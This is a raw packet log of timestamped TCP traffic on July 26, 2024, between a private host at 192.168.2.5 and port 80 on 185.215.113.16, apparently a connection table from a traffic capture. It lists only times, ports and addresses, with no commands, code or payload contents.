Jul 26, 2024 17:57:05.142992020 CEST	61181	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.143023968 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.143860102 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.143868923 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.143897057 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.143919945 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.144490004 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.144501925 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.144527912 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.144542933 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.145514965 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.145526886 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.145562887 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.146034956 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.146045923 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.146070004 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.146094084 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.146697044 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.146708012 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.146718979 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.146735907 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.146760941 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.149725914 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.149735928 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.149753094 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.149763107 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.149770021 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.149772882 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.149782896 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.149792910 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.149795055 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.149811983 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.149827957 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.150027037 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.150038004 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.150048018 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.150058985 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.150187969 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.150963068 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.150974035 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.150985003 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.150995016 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.151015997 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.151036024 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.151932955 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.151943922 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.151953936 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.151963949 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.151976109 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.151995897 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.156775951 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.156804085 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.156814098 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.156824112 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.156832933 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.156840086 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.156853914 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.156871080 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.158854961 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.158866882 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.158876896 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.158900023 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.158924103 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.159259081 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.159281015 CEST	80	61181	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.159291029 CEST	80	61181	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.159296036 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.159301996 CEST	80	61181	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.159322023 CEST	61181	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.159343004 CEST	61181	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.185156107 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.185224056 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.185250044 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.185261965 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.185307026 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.185307026 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.185815096 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.185827017 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.185837030 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.185861111 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.185887098 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.187203884 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.187216043 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.187311888 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.199707031 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.199754953 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.199836969 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.199847937 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.199892044 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.200958967 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.200970888 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.200980902 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.201005936 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.201047897 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.201514959 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.201524973 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.201534033 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.201551914 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.201575994 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.202533960 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.202545881 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.202555895 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.202567101 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.202572107 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.202603102 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.203562975 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.203573942 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.203583956 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.203603983 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.203624964 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.204596996 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.204608917 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.204618931 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.204643011 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.204668045 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.205847025 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.205856085 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.205866098 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.205876112 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.205883980 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.205913067 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.206453085 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.206465006 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.206474066 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.206499100 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.206510067 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.207263947 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.207276106 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.207284927 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.207304955 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.207328081 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.208080053 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.208091021 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.208100080 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.208108902 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.208126068 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.208149910 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.208914995 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.208925962 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.208935022 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.208947897 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.208972931 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.209714890 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.209724903 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.209733963 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.209748983 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.209774017 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.210536957 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.210547924 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.210556030 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.210565090 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.210582972 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.210592031 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.210616112 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.211406946 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.211419106 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.211427927 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.211458921 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.211477995 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.212238073 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.212249041 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.212259054 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.212279081 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.212306023 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.213006973 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.213018894 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.213027954 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.213038921 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.213047028 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.213076115 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.213874102 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.213886023 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.213896036 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.213907003 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.213913918 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.213936090 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.213959932 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.214787960 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.214798927 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.214807987 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.214818954 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.214828968 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.214858055 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.215800047 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.215811968 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.215847015 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.215991020 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.216001987 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.216011047 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.216021061 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.216031075 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.216056108 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.229216099 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.229317904 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.229329109 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.229402065 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.229825020 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.229835033 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.229844093 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.229882002 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.229917049 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.230628967 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.230639935 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.230648994 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.230665922 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.230695963 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.231400013 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.231410027 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.231419086 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.231430054 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.231437922 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.231472969 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.231501102 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.232202053 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.232213020 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.232220888 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.232232094 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.232251883 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.232300043 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.232984066 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.232994080 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.233002901 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.233025074 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.233056068 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.233772993 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.233783960 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.233793020 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.233803988 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.233819962 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.233846903 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.234570980 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.234581947 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.234590054 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.234618902 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.234643936 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.235374928 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.235384941 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.235392094 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.235402107 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.235418081 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.235441923 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.236145973 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.236156940 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.236165047 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.236175060 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.236185074 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.236215115 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.236743927 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.236789942 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.262247086 CEST	80	61181	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.262258053 CEST	80	61181	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.262350082 CEST	61181	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.262362003 CEST	80	61181	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.262401104 CEST	61181	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.262562990 CEST	80	61181	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.262573004 CEST	80	61181	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.262599945 CEST	61181	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.262624979 CEST	61181	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.263016939 CEST	80	61181	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.263026953 CEST	80	61181	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.263053894 CEST	61181	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.263082027 CEST	61181	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.263402939 CEST	80	61181	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.263411999 CEST	80	61181	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.263446093 CEST	61181	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.263672113 CEST	80	61181	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.263681889 CEST	80	61181	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.263708115 CEST	61181	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.263735056 CEST	61181	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.264168024 CEST	80	61181	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.264178991 CEST	80	61181	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.264189005 CEST	80	61181	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.264198065 CEST	61181	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.264224052 CEST	61181	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.264939070 CEST	80	61181	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.264950037 CEST	80	61181	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.264957905 CEST	80	61181	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.265014887 CEST	61181	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.265014887 CEST	61181	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.265307903 CEST	80	61181	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.265345097 CEST	80	61181	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.265355110 CEST	80	61181	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.265362024 CEST	61181	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.265393019 CEST	61181	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.265393019 CEST	61181	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.266105890 CEST	80	61181	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.266115904 CEST	80	61181	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.266127110 CEST	80	61181	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.266144991 CEST	61181	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.266174078 CEST	61181	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.267303944 CEST	80	61181	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.267359018 CEST	61181	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.267472982 CEST	80	61181	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.267525911 CEST	61181	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.267649889 CEST	80	61181	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.267661095 CEST	80	61181	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.267707109 CEST	61181	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.274585962 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.274708986 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.274719000 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.274759054 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.274791002 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.275162935 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.275173903 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.275182962 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.275214911 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.275242090 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.276226997 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.276293039 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.285860062 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.285871029 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.285881042 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.285916090 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.285947084 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.286303043 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.286314011 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.286323071 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.286350965 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.286381006 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.287077904 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.287089109 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.287098885 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.287122011 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.287147045 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.287817955 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.287857056 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.287858963 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.287867069 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.287875891 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.287890911 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.287915945 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.288638115 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.288650036 CEST	80	61179	185.215.113.16	192.168.2.5
